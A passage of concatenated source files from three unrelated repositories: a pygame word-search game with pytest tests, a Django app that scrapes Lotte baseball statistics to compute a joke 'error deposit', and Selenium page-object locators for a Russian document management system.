elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 3:
# User clicks the mouse. Get the position
pos = pygame.mouse.get_pos()
# Change the x/y screen coordinates to grid coordinates
column = pos[0] // scale
row = (pos[1] - scale) // scale
# Action for letters being selected
if (column < self.size and column >= 0) and (row < self.size and row >= 0):
rightDrag = True
selX = column
selY = row
if (selX, selY) in selected:
selected.remove((selX, selY))
# Events related to right click mouse up
elif event.type == pygame.MOUSEBUTTONUP and event.button == 3:
rightDrag = False
# Events related to mouse drag/motion
elif event.type == pygame.MOUSEMOTION and rightDrag:
pos = pygame.mouse.get_pos()
# Change the x/y screen coordinates to grid coordinates
column = pos[0] // scale
row = (pos[1] - scale) // scale
if (column, row) in selected:
selected.remove((column, row))
# Visual change for buttons being clicked
else:
check_color = grey
clear_color = light_blue
new_color = light_red
pygame.display.update()
frames += 1
clock.tick(60)
# Displaying everything on the screen
screen.fill(white)
# Takes the numpy array and puts it into a grid of labels
for row in range(0, self.size):
for col in range(0, self.size):
if (col, row) in selected:
letter_color = light_yellow
elif (col, row) in correctLetters:
letter_color = light_green
else:
letter_color = white
if a[row][col] == "-":
a[row][col] = random.choice(self.letters)
letter = font.render(a[row][col], True, black, letter_color)
letterRect = letter.get_rect()
letterRect.center = (col * scale + half, row * scale + (scale + half))
pygame.draw.rect(screen, letter_color, [scale * col, scale * row + scale, scale, scale])
screen.blit(letter, letterRect)
# Display all the words at the bottom of the screen
for i in range(0, self.numberOfWords):
col = i % 5
row = i // 5
if self.usedWords[i] in correct:
word_color = light_green
else:
word_color = white
fifth = width // 5
centerFifth = fifth // 2
half = scale // 2
word = small_font.render(self.usedWords[i], True, black, word_color)
wordRect = word.get_rect()
wordRect.center = (col * fifth + centerFifth, (row * scale + half) + (18 * scale))
pygame.draw.rect(screen, word_color, [fifth * col, (scale * row) + (18 * scale), fifth, scale])
screen.blit(word, wordRect)
# Check word and clear buttons
check = small_font.render("CHECK WORD", True, black, check_color)
checkRect = check.get_rect()
checkRect.center = (eighthW, half)
pygame.draw.rect(screen, check_color, [0, 0, quarterW, scale])
screen.blit(check, checkRect)
clear = small_font.render("CLEAR", True, black, clear_color)
clearRect = clear.get_rect()
clearRect.center = (3 * (eighthW), half)
pygame.draw.rect(screen, clear_color, [quarterW, 0, halfW, scale])
screen.blit(clear, clearRect)
# New game button and timer
new = small_font.render("NEW GAME", True, black, new_color)
newRect = new.get_rect()
newRect.center = (5 * (eighthW), half)
pygame.draw.rect(screen, new_color, [halfW, 0, quarterW * 3, scale])
screen.blit(new, newRect)
timer = small_font.render(time, True, black, light_orange)
timerRect = timer.get_rect()
timerRect.center = (7 * (eighthW), half)
pygame.draw.rect(screen, light_orange, [quarterW * 3, 0, width, scale])
screen.blit(timer, timerRect)
# Back to menu button
menu = small_font.render("BACK TO MENU", True, black, light_purple)
menuRect = menu.get_rect()
menuRect.center = (width // 2, (23 * scale) + (scale // 2))
pygame.draw.rect(screen, light_purple, [0, 23 * scale, width, scale])
screen.blit(menu, menuRect)
# Win condition
if len(correct) == self.numberOfWords:
win = True
text = "{0:02}:{1:02}".format(int(score[0]), int(score[1]))
if int(score[0]) > minutes or (int(score[0]) >= minutes and int(score[1]) > seconds):
with open("ws_high_score.txt", "w") as out:
out.write("{}\n{}".format(str(minutes), str(seconds)))
text = "{0:02}:{1:02}".format(minutes, seconds)
score_file.close()
complete = font.render("Puzzle complete! Best time: " + text, True, black, light_orange)
completeRect = complete.get_rect()
completeRect.center = (width // 2, (23 * scale) + (scale // 2))
pygame.draw.rect(screen, light_orange, [0, 23 * scale, width, height])
screen.blit(complete, completeRect)
frames += 1
clock.tick(60)
pygame.display.update()
#pygame.quit()
# test = WordSearch()
# test.playGame()
--- FILE SEPARATOR ---
# Test suite for word search game
import pytest
import numpy as np
import word_search
@pytest.fixture
def getWS():
return word_search.WordSearch()
# Arrange, get a blank board
@pytest.fixture
def getBoard(getWS):
board = np.zeros([getWS.size, getWS.size], dtype=str)
# Fill the array with -'s as placeholders
for row in range(0, getWS.size):
for col in range(0, getWS.size):
board[row][col] = "-"
return board
def test_printClass(getWS):
result = getWS.printClass()
test = "This is the word search class."
assert result == test
def test_checkWord(getWS, getBoard):
result = getWS.checkWord("test", 0, 0, "E", getBoard)
assert result
def test_fillWord(getWS, getBoard):
x = 0
y = 0
word = "test"
result = getWS.fillWord(word, x, y, "E", getBoard)
test = getBoard
for i in range(0, len(word)):
test[x+i][y] = word[i:i+1]
assert np.array_equal(result, test)
def test_addWord(getWS, getBoard):
x = 0
y = 0
word = "test"
result = getWS.addWord("test", 0, 0, "E", getBoard)
test = getBoard
for i in range(0, len(word)):
test[x+i][y] = word[i:i+1]
assert np.array_equal(result, test)
def test_generateGame(getWS, getBoard):
result = getWS.generateGame()
test = getBoard
for row in range(0, getWS.size):
for col in range(0, getWS.size):
assert result[row][col] is not test[row][col]
|
[
"/chess.py",
"/chess_test.py",
"/menu.py",
"/minesweeper.py",
"/minesweeper_test.py",
"/setup.py",
"/sudoku.py",
"/sudoku_test.py",
"/word_search.py",
"/word_search_test.py"
] |
01-2/lotte_error_deposit
|
import pandas as pd
import datetime
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "lotte_error_deposit.settings")
import django
django.setup()
from parsed_total_data.models import TotalData, SeasonData
'''
SO(Strike Outs/500) & DP(Double Plays/1000) : http://www.statiz.co.kr/stat.php?re=0&lr=5
HR(Home Run/1000) & BK(Balk/3000) & PB(Passed Balls/5000) : http://www.statiz.co.kr/stat.php?re=1&lr=5
E(Error/10000) : http://www.statiz.co.kr/stat.php?re=2&lr=5
'''
def calc_money(stkOut, dbplay, homerun, balk, passedBall, error):
money = (stkOut * 500) + (dbplay * 1000) + \
(homerun * 1000) + (balk * 3000) + \
(passedBall * 5000) + (error * 10000)
return money
def get_data() :
df_bat = pd.read_html('http://www.statiz.co.kr/stat.php?re=0&lr=5')[0]
df_pit = pd.read_html('http://www.statiz.co.kr/stat.php?re=1&lr=5')[0]
df_def = pd.read_html('http://www.statiz.co.kr/stat.php?re=2&lr=5')[0]
df_bat = df_bat.drop(df_bat.index[0:4])
df_pit = df_pit.drop(df_pit.index[0:4])
df_def = df_def.drop(df_def.index[0:4])
col_list = []
for i in range(0, df_bat.columns.size):
col_list.append(df_bat.columns.values[i][2])
df_bat.columns = col_list
col_list = []
for i in range(0, df_pit.columns.size):
col_list.append(df_pit.columns.values[i][2])
df_pit.columns = col_list
col_list = []
for i in range(0, df_def.columns.size):
col_list.append(df_def.columns.values[i][2])
df_def.columns = col_list
df_bat = df_bat.loc[:, ~df_bat.columns.str.contains('^Unnamed')]
df_pit = df_pit.loc[:, ~df_pit.columns.str.contains('^Unnamed')]
df_def = df_def.loc[:, ~df_def.columns.str.contains('^Unnamed')]
bat_lotte = df_bat[df_bat['이름'].isin(['롯데'])]
pit_lotte = df_pit[df_pit['이름'].isin(['롯데'])]
def_lotte = df_def[df_def['이름'].isin(['롯데'])]
print(bat_lotte)
print(pit_lotte)
print(def_lotte)
so_num = bat_lotte['삼진'].astype(int)
dp_num = bat_lotte['병살'].astype(int)
print('삼진 : {0} / 병살 : {1}'.format(so_num.values, dp_num.values))
hr_num = pit_lotte['홈런'].astype(int)
bk_num = pit_lotte['보크'].astype(int)
pb_num = pit_lotte['폭투'].astype(int)
print('피홈런 : {0} / 보크 : {1} / 폭투 : {2}'.format(hr_num.values, bk_num.values, pb_num.values))
e_num = def_lotte['실책'].astype(int)
print('실책 : {0}'.format(e_num.values))
result = {'stkOut':so_num,
'dbplay':dp_num,
'homerun':hr_num,
'balk':bk_num,
'passedBall':pb_num,
'error':e_num}
return result
if __name__=='__main__':
season_data = SeasonData.objects.last()
total_data = get_data()
if season_data is not None :
diff_stkOut = int(total_data['stkOut']) - (getattr(season_data, 'stkOut'))
diff_dbplay = int(total_data['dbplay']) - (getattr(season_data, 'dbplay'))
diff_homerun = int(total_data['homerun']) - (getattr(season_data, 'homerun'))
diff_balk = int(total_data['balk']) - (getattr(season_data, 'balk'))
diff_passedBall = int(total_data['passedBall']) - (getattr(season_data, 'passedBall'))
diff_error = int(total_data['error']) - (getattr(season_data, 'error'))
print(diff_stkOut)
# 실책이 발생한 날만 저장하도록 수정할 것
TotalData(date = datetime.date.today(),
stkOut = diff_stkOut,
dbplay = diff_dbplay,
homerun = diff_homerun,
balk = diff_balk,
passedBall = diff_passedBall,
error = diff_error,
money = calc_money(diff_stkOut, diff_dbplay,
diff_homerun, diff_balk,
diff_passedBall, diff_error)).save()
if getattr(season_data,'date') == datetime.date.today():
SeasonData.objects.delete()
SeasonData(date = datetime.date.today().year,
stkOut = total_data['stkOut'],
dbplay = total_data['dbplay'],
homerun = total_data['homerun'],
balk = total_data['balk'],
passedBall = total_data['passedBall'],
error = total_data['error'],
money = calc_money(int(total_data['stkOut']),
int(total_data['dbplay']),
int(total_data['homerun']),
int(total_data['balk']),
int(total_data['passedBall']),
int(total_data['error']))
).save()
--- FILE SEPARATOR ---
from django.apps import AppConfig
class DispdepositConfig(AppConfig):
name = 'dispDeposit'
--- FILE SEPARATOR ---
from django.shortcuts import render
from parsed_total_data.models import TotalData, SeasonData
def calc_money(stkOut, dbplay, homerun, balk, passedBall, error):
money = (stkOut * 500) + (dbplay * 1000) + \
(homerun * 1000) + (balk * 3000) + \
(passedBall * 5000) + (error * 10000)
return money
# Create your views here.
def index(request):
total_data = SeasonData.objects.last()
total_money = calc_money(total_data.stkOut, total_data.dbplay,
total_data.homerun, total_data.balk,
total_data.passedBall, total_data.error)
total_money = str(format(total_money, ","))
print(total_money)
context = {'total_data':total_data, 'total_money':total_money}
return render(request, 'index.html', context)
def history(request):
m_history = TotalData.objects.all()
s_data = SeasonData.objects.last()
context = {'history':m_history, 'season':s_data}
return render(request, 'history.html', context)
def patch_note(request):
return render(request, 'patch_note.html')
def contact(request):
return render(request, 'contact.html')
--- FILE SEPARATOR ---
from django.contrib import admin
from .models import TotalData, SeasonData
# Register your models here.
admin.site.register(TotalData)
admin.site.register(SeasonData)
--- FILE SEPARATOR ---
from django.apps import AppConfig
class ParsedTotalDataConfig(AppConfig):
name = 'parsed_total_data'
--- FILE SEPARATOR ---
# Generated by Django 2.2.7 on 2019-11-25 13:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='TotalData',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('stkOut', models.PositiveIntegerField()),
('dbplay', models.PositiveIntegerField()),
('homerun', models.PositiveIntegerField()),
('balk', models.PositiveIntegerField()),
('wildPitch', models.PositiveIntegerField()),
('mistake', models.PositiveIntegerField()),
],
),
]
--- FILE SEPARATOR ---
# Generated by Django 2.2.7 on 2019-11-25 14:04
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('parsed_total_data', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='totaldata',
old_name='mistake',
new_name='error',
),
migrations.RenameField(
model_name='totaldata',
old_name='wildPitch',
new_name='passedBall',
),
]
--- FILE SEPARATOR ---
# Generated by Django 2.2.7 on 2019-11-25 14:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('parsed_total_data', '0002_auto_20191125_1404'),
]
operations = [
migrations.AddField(
model_name='totaldata',
name='totalMoney',
field=models.PositiveIntegerField(default=0),
),
]
--- FILE SEPARATOR ---
# Generated by Django 2.2.7 on 2019-11-25 15:11
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('parsed_total_data', '0003_totaldata_totalmoney'),
]
operations = [
migrations.RemoveField(
model_name='totaldata',
name='totalMoney',
),
]
--- FILE SEPARATOR ---
# Generated by Django 2.2.7 on 2019-11-26 13:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('parsed_total_data', '0004_remove_totaldata_totalmoney'),
]
operations = [
migrations.AddField(
model_name='totaldata',
name='money',
field=models.PositiveIntegerField(null=True),
),
]
--- FILE SEPARATOR ---
from django.db import models
# Create your models here.
class TotalData(models.Model):
date = models.DateField()
stkOut = models.PositiveIntegerField()
dbplay = models.PositiveIntegerField()
homerun = models.PositiveIntegerField()
balk = models.PositiveIntegerField()
passedBall = models.PositiveIntegerField()
error = models.PositiveIntegerField()
money = models.PositiveIntegerField(null=True)
def __str__(self):
return str(self.date)
class SeasonData(models.Model):
date = models.PositiveIntegerField()
stkOut = models.PositiveIntegerField()
dbplay = models.PositiveIntegerField()
homerun = models.PositiveIntegerField()
balk = models.PositiveIntegerField()
passedBall = models.PositiveIntegerField()
error = models.PositiveIntegerField()
money = models.PositiveIntegerField(null=True)
def __str__(self):
return str(self.date)
--- FILE SEPARATOR ---
from django.contrib import admin
from patch_board.models import patchBoard
# Register your models here.
admin.site.register(patchBoard)
--- FILE SEPARATOR ---
from django.apps import AppConfig
class PatchBoardConfig(AppConfig):
name = 'patch_board'
--- FILE SEPARATOR ---
from django.db import models
from ckeditor_uploader.fields import RichTextUploadingField
# Create your models here.
class patchBoard(models.Model):
subject = models.CharField(max_length=50, blank=True)
name = models.CharField(max_length=50, blank=True)
created_date = models.DateField(null=True, blank=True)
memo = models.CharField(max_length=1000, blank=True)
hits = models.PositiveIntegerField(null=True, blank=True)
description = RichTextUploadingField(null=True, blank=True)
|
[
"/crawl_total_stats.py",
"/dispDeposit/apps.py",
"/dispDeposit/views.py",
"/parsed_total_data/admin.py",
"/parsed_total_data/apps.py",
"/parsed_total_data/migrations/0001_initial.py",
"/parsed_total_data/migrations/0002_auto_20191125_1404.py",
"/parsed_total_data/migrations/0003_totaldata_totalmoney.py",
"/parsed_total_data/migrations/0004_remove_totaldata_totalmoney.py",
"/parsed_total_data/migrations/0005_totaldata_money.py",
"/parsed_total_data/models.py",
"/patch_board/admin.py",
"/patch_board/apps.py",
"/patch_board/models.py"
] |
0100101001/PyTestKSED
|
from page_objects import PageObject, PageElement, MultiPageElement
from KSED.TestData.locators import KSEDLocators
class Locator(PageObject, KSEDLocators):
# Форма авторизации
username_text = PageElement(name=KSEDLocators.username_text) # Логин
password_text = PageElement(name=KSEDLocators.password_text) # Пароль
LogIn_button = PageElement(xpath=KSEDLocators.LogIn_button) # Кнопка "Войти"
# *******СТРОКА МЕНЮ*******
ksed = PageElement(xpath=KSEDLocators.ksed) #xpath # КСЭД
barcode_search = PageElement(id_=KSEDLocators.barcode_search) #id # Поиск по ШК
search_bc = PageElement(xpath=KSEDLocators.search_bc) # Строка поиска по ШК
more_menu = PageElement(id_=KSEDLocators.more_menu)# Меню "Ещё"
ksed_in_more_m = PageElement(id_=KSEDLocators.ksed_in_more_m) # КСЭД в меню "Ещё"
Company_dir = PageElement(xpath=KSEDLocators.Company_dir) # Справочник организации
admin = PageElement(xpath=KSEDLocators.admin) # Администрирование
transfer = PageElement(xpath=KSEDLocators.transfer) # Передача дел
arm_arh = PageElement(xpath=KSEDLocators.arm_arh) # АРМ Архивное дело
verify = PageElement(xpath=KSEDLocators.verify) # Верификация
scanner = PageElement(xpath=KSEDLocators.scanner) # Работа со сканером ШК
notification = PageElement(id_=KSEDLocators.notification) # Уведомления
notificationProtokol = PageElement(xpath=KSEDLocators.notificationProtokol) # Первое в списке уведомление о протоколе
notificationFirst = PageElement(xpath=KSEDLocators.notificationFirst) # id # Уведомление первое в списке
# *******МЕНЮ ПОЛЬЗОВАТЕЛЯ*******
user_menu = PageElement(id_=KSEDLocators.user_menu) # Меню пользователя
USER_LOGOUT = PageElement(id_=KSEDLocators.USER_LOGOUT) # Выход из системы
my_profile = PageElement(xpath=KSEDLocators.my_profile) # Пункт меню "Мой профиль"
fieldlabel = PageElement(xpath=KSEDLocators.fieldlabel) # Должность в области краткой информации
btnEdit_profile = PageElement(xpath=KSEDLocators.btnEdit_profile) # Кнопка "Изменить профиль"
inputPosition = PageElement(xpath=KSEDLocators.inputPosition) # Поле ввода должности
logic_ESM = PageElement(xpath=KSEDLocators.logic_ESM) # Пункт меню "Логика ECM. Мой профиль"
autoAnswerText = PageElement(name=KSEDLocators.autoAnswerText) # Текст автоответа (Меня нет в офисе)
btnCancelAbsence = PageElement(xpath=KSEDLocators.btnCancelAbsence) # Кнопка "Отменить отсутствие"
btnYes = PageElement(xpath=KSEDLocators.btnYes) # Кнопка "Да" (отменить отсутствие)
edit_password = PageElement(xpath=KSEDLocators.edit_password) # Пункт меню "Изменить пароль"
inputOldPassword = PageElement(xpath=KSEDLocators.inputOldPassword) # Введите старый пароль
inputNewPassword1 = PageElement(xpath=KSEDLocators.inputNewPassword1) # Введите старый пароль
inputNewPassword2 = PageElement(xpath=KSEDLocators.inputNewPassword2) # Введите старый пароль
btnOKchange = PageElement(xpath=KSEDLocators.btnOKchange) # Кнопка "Изменить пароль"
# *******ЛЕВАЯ ЧАСТЬ СТРАНИЦЫ (Кнопка "Создать" и разделы)*******
newDoc_button = PageElement(xpath=KSEDLocators.newDoc_button) # "Создать"
protocol = PageElement(xpath=KSEDLocators.protocol) # Протокол
rd = PageElement(xpath=KSEDLocators.rd) # РД
reestr = PageElement(xpath=KSEDLocators.reestr) # Реестр
poruchenie = PageElement(xpath=KSEDLocators.poruchenie) # Поручение
resolution = PageElement(xpath=KSEDLocators.resolution) # Резолюция
SZ = PageElement(xpath=KSEDLocators.SZ) # Служебная записка
proizvDoc = PageElement(xpath=KSEDLocators.proizvDoc) # Произвольный документ
paket_vh = PageElement(xpath=KSEDLocators.paket_vh) #Пакет Вх. кор.
vhDoc = PageElement(xpath=KSEDLocators.vhDoc) # Входящий документ
ishDoc = PageElement(xpath=KSEDLocators.ishDoc) # Исходящий документ
# РАЗДЕЛЫ
myWork = PageElement(xpath=KSEDLocators.myWork) # Моя работа
expedition = PageElement(xpath=KSEDLocators.expedition) # Экспедиция
navigation = PageElement(xpath=KSEDLocators.navigation) # Навигатор
allur = PageElement(xpath=KSEDLocators.allur) # Отчеты
workReg = PageElement(xpath=KSEDLocators.workReg) # Работа регистратора
medo = PageElement(xpath=KSEDLocators.medo) # МЭДО
mySearch = PageElement(xpath=KSEDLocators.mySearch) # Мои поисковые запросы
poiskzapr = PageElement(xpath=KSEDLocators.poiskzapr) # Поисковые запросы
myPoiskZapr = PageElement(xpath=KSEDLocators.myPoiskZapr) # Поисковые запросы
ControlZapr = PageElement(xpath=KSEDLocators.ControlZapr) # Упарвление поисковыми запросами
# ОБЛАСТЬ ПРОСМОТРА (КСЭД)
oblProsm = PageElement(xpath=KSEDLocators.oblProsm) # Область просмотра
oneDocInList = PageElement(xpath=KSEDLocators.oneDocInList) # Первый документ в списке
nineDocInList = PageElement(xpath=KSEDLocators.nineDocInList) # Девятый документ в списке
subordinate = MultiPageElement(xpath=KSEDLocators.subordinate) # "+" раскрытие подчиненные документы
oneSubordInList = PageElement(xpath=KSEDLocators.oneSubordInList) # Первая ссылка на подчиненный документ
ActionTab = PageElement(xpath=KSEDLocators.ActionTab) # Кнопка "Действия с выбранными"
chBinOnl = PageElement(xpath=KSEDLocators.chBinOnl)
# Моя работа
WorkImmid = PageElement(xpath=KSEDLocators.WorkImmid) # xpath # Моя работа - срочные
connectedDoc = PageElement(xpath=KSEDLocators.connectedDoc) # xpath # связанные документы
# ОТЧЕТЫ
section_allur = PageElement(xpath=KSEDLocators.section_allur) # Раздел "Отчеты"
node_Logs = PageElement(xpath=KSEDLocators.node_Logs) # "Журналы"
node_Statis = PageElement(xpath=KSEDLocators.node_Statis) # "Статистические отчеты"
edsBykindStat = PageElement(xpath=KSEDLocators.edsBykindStat) # Отчет "Сводка по видам документов"
node_ispDisp = PageElement(xpath=KSEDLocators.node_ispDisp) #
logs_incDoc = PageElement(xpath=KSEDLocators.logs_incDoc)
incomingRegJournal = PageElement(xpath=KSEDLocators.incomingRegJournal) # Отчет "Журнал регистрации входящих документов"
logs_outDoc = PageElement(xpath=KSEDLocators.logs_outDoc)
outgoingRegistration = PageElement(xpath=KSEDLocators.outgoingRegistration) # Отчет "Журнал регистрации исходящих документов"
logs_raspDoc = PageElement(xpath=KSEDLocators.logs_raspDoc)
ordRegJournal = PageElement(xpath=KSEDLocators.ordRegJournal) # Отчет "Журнал регистрации Распорядительных документов"
logs_sluDoc = PageElement(xpath=KSEDLocators.logs_sluDoc)
internalRegJournal = PageElement(xpath=KSEDLocators.internalRegJournal) # Отчет "Журнал регистрации служебных записок"
stat_specDoc = PageElement(xpath=KSEDLocators.stat_specDoc)
stat_temDoc = PageElement(xpath=KSEDLocators.stat_temDoc)
edsBySubjectStat = PageElement(xpath=KSEDLocators.edsBySubjectStat) # Отчет "Сводка по тематикам документов"
stat_temDocO = PageElement(xpath=KSEDLocators.stat_temDocO)
edsBySubjectStatO = PageElement(xpath=KSEDLocators.edsBySubjectStatO) # Отчет "Сводка по тематикам документов(объед)"
stat_tipDoc = PageElement(xpath=KSEDLocators.stat_tipDoc)
edByTypeStat = PageElement(xpath=KSEDLocators.edByTypeStat) # Отчет "Сводка по типам документов"
allu_ispIncDoc = PageElement(xpath=KSEDLocators.allu_ispIncDoc)
allu_raspDoc = PageElement(xpath=KSEDLocators.allu_raspDoc)
allu_sluDoc = PageElement(xpath=KSEDLocators.allu_sluDoc)
allu_ispDis = PageElement(xpath=KSEDLocators.allu_ispDis)
allu_ispDispA = PageElement(xpath=KSEDLocators.allu_ispDispA)
allu_NispDI = PageElement(xpath=KSEDLocators.allu_NispDI)
allu_NispDIrg = PageElement(xpath=KSEDLocators.allu_NispDIrg)
allu_istS = PageElement(xpath=KSEDLocators.allu_istS)
allu_narS = PageElement(xpath=KSEDLocators.allu_narS)
allu_prodIsp = PageElement(xpath=KSEDLocators.allu_prodIsp)
allu_prodPodr = PageElement(xpath=KSEDLocators.allu_prodPodr)
allu_ReesContr = PageElement(xpath=KSEDLocators.allu_ReesContr)
allu_ReesContrN = PageElement(xpath=KSEDLocators.allu_ReesContrN)
allu_ReesContrF = PageElement(xpath=KSEDLocators.allu_ReesContrF)
allu_SostIspR = PageElement(xpath=KSEDLocators.allu_SostIspR)
# *******РАБОТА С ДОКУМЕНТАМИ*******
# ОБЩИЕ АТРИБУТЫ
#(форма создания документа)
title = PageElement(name=KSEDLocators.title) # Заголовок
category_doc = PageElement(xpath=KSEDLocators.category_doc) # Категория документа
doc_type = PageElement(xpath=KSEDLocators.doc_type) # Вид документа(кнопка выбора)
doc_typeInp = PageElement(xpath=KSEDLocators.doc_typeInp) # Вид документа(поле ввода)
btnOKDT = PageElement(xpath=KSEDLocators.btnOKDT) # Вид документа (кнопка "ОК")
podpisant = PageElement(xpath=KSEDLocators.podpisant) # Подписант(ы)
sposob_dost = PageElement(xpath=KSEDLocators.sposob_dost) # Способ доставки
btnCreateDoc = PageElement(xpath=KSEDLocators.btnCreateDoc) # Кнопка "Создать"
adresat = PageElement(xpath=KSEDLocators.adresat) # Адресат
korrespondent = PageElement(xpath=KSEDLocators.korrespondent) # Корреспондент
# (карточка документа)
attachments = PageElement(xpath=KSEDLocators.attachments) # # Переход во вкладку "Вложения"
vlozheniya = PageElement(xpath=KSEDLocators.vlozheniya) # Вложения (раскрытие раздела)
osnSvedeniya = PageElement(xpath=KSEDLocators.osnSvedeniya) # Основные сведения (раскрытие раздела)
printForm = PageElement(xpath=KSEDLocators.printForm)# Печатные формы (раскрытие раздела)
printBarCode = PageElement(xpath=KSEDLocators.printBarCode) #Печатная форма штрих кода документа
btnPrintInPrintForm = PageElement(id_=KSEDLocators.btnPrintInPrintForm)# Кнопка печати в окне печатной формы
btnOKpodpis = PageElement(xpath=KSEDLocators.btnOKpodpis) # Кнопка ОК подтверждение подписания
mode = PageElement(xpath=KSEDLocators.mode) # Переключение в двупанельный вид
fileUpload = PageElement(xpath=KSEDLocators.fileUpload) # Загрузить файл
fileUpload2 = PageElement(xpath=KSEDLocators.fileUpload2) # Загрузить файл в поручении
fileUpload3 = PageElement(xpath=KSEDLocators.fileUpload3) # Загрузить файл в поручении
files = PageElement(xpath=KSEDLocators.files) # Выберите файлы
show = PageElement(xpath=KSEDLocators.show) # Показать общую карточка
show_list = PageElement(xpath=KSEDLocators.show_list)# Показать ввиде списка
dropBtn = PageElement(xpath=KSEDLocators.dropBtn) # Кнопка выпадающего списка
resultSogl = PageElement(xpath=KSEDLocators.resultSogl) # результат согласования
btnPrint = PageElement(xpath=KSEDLocators.btnPrint) # Кнопка печати в форме предварительного просмотра вложения
soglasovanieWkladka = PageElement(xpath=KSEDLocators.soglasovanieWkladka) # Вкладка "Согласование"
soglasovanieWkladka2 = PageElement(xpath=KSEDLocators.soglasovanieWkladka2) # Вкладка "Согласование"
createRuleBtn = PageElement(xpath=KSEDLocators.createRuleBtn) # Кнопка "Создать маршрут"
createRuleIndivid = PageElement(xpath=KSEDLocators.createRuleIndivid) # "Индивидуальный маршрут"
addEtap = PageElement(xpath=KSEDLocators.addEtap) # Кнопка "Добавить этап"
tipeEtap = PageElement(xpath=KSEDLocators.tipeEtap) # "Вид этапа"
soglasuychie = PageElement(xpath=KSEDLocators.soglasuychie) # "Согласующие"
btnOKformSogl = PageElement(xpath=KSEDLocators.btnOKformSogl) # Кнопка "ОК" на форме добавления этапа согласования
btnTree = PageElement(xpath=KSEDLocators.btnTree) # Кнопка ...
btnSelection3 = PageElement(xpath=KSEDLocators.btnSelection3) # 3 выбор
punkti = PageElement(xpath=KSEDLocators.punkti) # Вкладка "Пункты"
punktiBtn = PageElement(xpath=KSEDLocators.punktiBtn) # Кнопка "Пункты"
punktPoruch = PageElement(xpath=KSEDLocators.punktPoruch) # Пункт/Поручение
textPoruch = PageElement(xpath=KSEDLocators.textPoruch) # Текст поручения
tipPoruch = PageElement(xpath=KSEDLocators.tipPoruch) # Тип поручения
otvetstv_ispolnVpunktah = PageElement(xpath=KSEDLocators.otvetstv_ispolnVpunktah) # Ответственный исполнитель в пунктах карточки документа
srokIspoln = PageElement(xpath=KSEDLocators.srokIspoln) # Срок исполнения (среднее знач)
btnOKform = PageElement(xpath=KSEDLocators.btnOKform) # Кнопка ОК на форме
sendFor_approval = PageElement(xpath=KSEDLocators.sendFor_approval) # Действие "Направить на согласование"
sendFor_podpis = PageElement(xpath=KSEDLocators.sendFor_podpis) # Действие "Направить на подписание"
sendFor_execution = PageElement(xpath=KSEDLocators.sendFor_execution) # Действие "Направить на исполнение"
btnOKnaprNaIspoln = PageElement(xpath=KSEDLocators.btnOKnaprNaIspoln) # Кнопка "ОК" на форме подтверждения действия "Направить на исполнение"
confirm = PageElement(xpath=KSEDLocators.confirm) # Подтверждение согласования
confirm2 = PageElement(xpath=KSEDLocators.confirm2) # Подтверждение согласования
confirm_3 = PageElement(xpath=KSEDLocators.confirm_3) # Подтверждение согласования
confirm_4 = PageElement(xpath=KSEDLocators.confirm_4) # Подтверждение согласования
confirm_5 = PageElement(xpath=KSEDLocators.confirm_5) # Подтверждения выбора
status_Doc = PageElement(xpath=KSEDLocators.status_Doc) # Статус документа во вкладке (Основные сведения)
#"Отправить отчет"
actionSendAllere = PageElement(xpath=KSEDLocators.actionSendAllere) # "Отправить отчет" действие
btnSend = PageElement(xpath=KSEDLocators.btnSend) # Кнопка "Отправить"
textAllur = PageElement(xpath=KSEDLocators.textAllur) # Текстовое поле "Текст отчета"
btnAddSvyz = PageElement(xpath=KSEDLocators.btnAddSvyz) # Кнопка добавления связи "..."
searchDoc = PageElement(xpath=KSEDLocators.searchDoc) # Строка поиска в форме подбора
oneListEl = PageElement(xpath=KSEDLocators.oneListEl) # Первый элемент в списке справочника
btnOK = PageElement(xpath=KSEDLocators.btnOK) # Кнопка "ОК" в форме подбора
# (панель согласования)
APPROVED_button = PageElement(xpath=KSEDLocators.APPROVED_button) # Кнопка "Согласовать"
APPROVED_WITH_REMARK_button = PageElement(xpath=KSEDLocators.APPROVED_WITH_REMARK_button) # Кнопка "Согласовать с комментариями"
REJECTED_button = PageElement(xpath=KSEDLocators.REJECTED_button) # Кнопка "Отклонить"
internal_approval = PageElement(xpath=KSEDLocators.internal_approval) # Кнопка "Внутреннее согласование"
prop_bpm_comment = PageElement(name=KSEDLocators.prop_bpm_comment) # Поле комментария
apply_button_button = PageElement(xpath=KSEDLocators.apply_button_button) # Кнопка "ОК" при вынесении решения согласования
apply_button_button2 = PageElement(xpath=KSEDLocators.apply_button_button2) # Кнопка "ОК" при вынесении решения согласования
SIGNED_button = PageElement(xpath=KSEDLocators.SIGNED_button) # Кнопка "Подписать"
# # ПРОТОКОЛ
# #(форма создания документа)
# addEl = PageElement(xpath=KSEDLocators.addEl) # Вид документа(Протокол совещания рабочей группы)
# addEl2 = PageElement(xpath=KSEDLocators.addEl2) #Вид документа "Служебная записка"
# РАСПОРЯДИТЕЛЬНЫЙ ДОКУМЕНТ
#(форма создания документа)
addEl = PageElement(xpath=KSEDLocators.addEl) # Вид документа(Протокол совещания рабочей группы)
addEl2 = PageElement(xpath=KSEDLocators.addEl2) #Вид документа "Служебная записка"
preambula = PageElement(xpath=KSEDLocators.preambula) # Преамбула
obcontrol = PageElement(xpath=KSEDLocators.obcontrol) # Общий контроль
wid_doc = PageElement(xpath=KSEDLocators.wid_doc) # Вид документа (в РД)
wid_doc_rasp = PageElement(xpath=KSEDLocators.wid_doc_rasp) # Вид документа РД (Распоряжение)
addPunkt = PageElement(xpath=KSEDLocators.addPunkt) # Кнопка "Добавить пункт"
textPunktaRD = PageElement(name=KSEDLocators.textPunktaRD) # Текст пункта РД
otvetstv_ispolnVpunktahRD = PageElement(xpath=KSEDLocators.otvetstv_ispolnVpunktahRD) # Ответственный исполнитель в пункте РД
rassilka = PageElement(xpath=KSEDLocators.rassilka) # Вкладка "Рассылка"
btnVipolnit = PageElement(xpath=KSEDLocators.btnVipolnit) # Кнопка "Выполнить..."
